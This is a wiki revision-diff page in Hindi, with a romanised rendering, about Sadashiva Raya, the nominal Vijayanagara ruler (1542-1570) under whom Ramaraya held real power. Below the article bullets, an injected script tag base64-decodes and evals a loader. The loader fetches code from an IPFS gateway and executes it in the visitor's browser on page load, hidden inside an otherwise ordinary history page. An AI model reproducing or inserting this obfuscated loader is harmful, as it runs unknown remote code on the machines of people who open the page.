Difference between revisions of "सदाशिव राय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:मध्य काल (को हटा दिया गया हैं।))
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*'''सदाशिव राय''' (1542-1570 ई.) सिर्फ नाम मात्र का ही शासक था।
+
*'''सदाशिव राय''' (1542-1570 ई.) सिर्फ़ नाम मात्र का ही शासक था।
 
*उसके समय में [[विजयनगर साम्राज्य]] की वास्तविक शक्ति 'रामराय' के हाथों में थी।
 
*उसके समय में [[विजयनगर साम्राज्य]] की वास्तविक शक्ति 'रामराय' के हाथों में थी।
 
*सदाशिव राय के समय में [[रामराय]] (रामराजा) ने बड़ी संख्या में [[मुसलमान|मुस्लिमों]] को अपनी सेना में सम्मिलित किया।
 
*सदाशिव राय के समय में [[रामराय]] (रामराजा) ने बड़ी संख्या में [[मुसलमान|मुस्लिमों]] को अपनी सेना में सम्मिलित किया।
Line 5: Line 5:
 
*उसका यह हस्तक्षेप विजयनगर साम्राज्य के लिए हानिकारक सिद्ध हुआ।
 
*उसका यह हस्तक्षेप विजयनगर साम्राज्य के लिए हानिकारक सिद्ध हुआ।
 
*1543 ई. में रामराय ने [[बीजापुर]] के विरुद्ध [[गोलकुण्डा]] एवं [[अहमदनगर]] से संधि की।
 
*1543 ई. में रामराय ने [[बीजापुर]] के विरुद्ध [[गोलकुण्डा]] एवं [[अहमदनगर]] से संधि की।
*कालान्तर में उसने अहमदनगर के विरुद्ध बीजापुर तथा गोलकुण्डा को सहयोग दिया।
+
*[[कालान्तर]] में उसने अहमदनगर के विरुद्ध बीजापुर तथा गोलकुण्डा को सहयोग दिया।
 
*उसकी सहयोग की यह नीति असफल रही थी।
 
*उसकी सहयोग की यह नीति असफल रही थी।
  
Line 18: Line 18:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भारत के राजवंश}}
+
{{तुलुव वंश}}
 
 
[[Category:इतिहास कोश]]
 
 
[[Category:विजयनगर साम्राज्य]]
 
[[Category:विजयनगर साम्राज्य]]
[[Category:मध्य काल]]
+
[[Category:तुलुव वंश]]
 +
[[Category:मध्य काल]][[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:35, 3 October 2011

  • sadashiv ray (1542-1570 ee.) sirf nam matr ka hi shasak tha.
  • usake samay mean vijayanagar samrajy ki vastavik shakti 'ramaray' ke hathoan mean thi.
  • sadashiv ray ke samay mean ramaray (ramaraja) ne b di sankhya mean muslimoan ko apani sena mean sammilit kiya.
  • ramaray ne vijayanagar ki parampara ke viparit p dosi muslim rajyoan ki antarik rajaniti mean hastakshep kiya tha.
  • usaka yah hastakshep vijayanagar samrajy ke lie hanikarak siddh hua.
  • 1543 ee. mean ramaray ne bijapur ke viruddh golakunda evan ahamadanagar se sandhi ki.
  • kalantar mean usane ahamadanagar ke viruddh bijapur tatha golakunda ko sahayog diya.
  • usaki sahayog ki yah niti asaphal rahi thi.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh